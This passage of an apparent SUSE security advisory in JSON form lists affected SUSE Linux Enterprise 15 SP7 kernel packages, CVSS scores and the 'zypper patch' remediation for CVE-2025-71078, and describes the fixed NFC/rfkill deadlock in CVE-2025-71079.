"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
